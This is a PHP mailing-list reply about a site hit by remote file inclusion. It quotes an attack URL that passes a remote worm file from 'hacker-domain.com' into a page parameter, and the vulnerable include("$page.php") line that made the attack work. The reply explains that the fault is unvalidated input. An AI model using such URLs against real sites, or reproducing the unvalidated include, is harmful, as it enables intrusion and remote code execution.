Seak, Teng-Fong wrote:
But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.
Actually, they're using an URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?
And the some-worm-file.txt file contains some PHP code, while my
index.php contains this instruction:
include("$page.php");
This is enough to make infiltration possible! IMO, this instruction
is supposed to be used like this, isn't it? So this is obviously a PHP
security loophole and I don't see how the "poorly written scripts" can
help anything unless a totally rewrite! And there's no "poor server
security" that I can see.
You mean to say that you're not validating what you're getting from the
user? Frankly you deserve everything you get. This is *not* a "security
loophole", it *is* a poorly written script.
I've installed PHP5 and the problem seems fixed. However, PHP
writes out where the problem occurs! Indeed, the hacker could read a
line like this:
Warning: include() [function.include]: URL file-access is disabled in
the server configuration in
C:\Inetpub\wwwroot\index.php on line X
I don't want them (the hackers) to be able to read this either.
That gives too much information about my server's file system. How can
I stop that?
Read the manual, specifically the error_reporting part. You can turn the
display of these messages off.
By the way, I know there're still a lot of servers out there still
using PHP4. Is this vulnerability a known bug? At least, I'm not aware
of that before!
It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+)
introduces the ability to turn off the ability to prevent this issue,
but it's still badly written code. Stop blaming the tool, start blaming
the mirror image and start learning how to code defensively.
-Stut
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php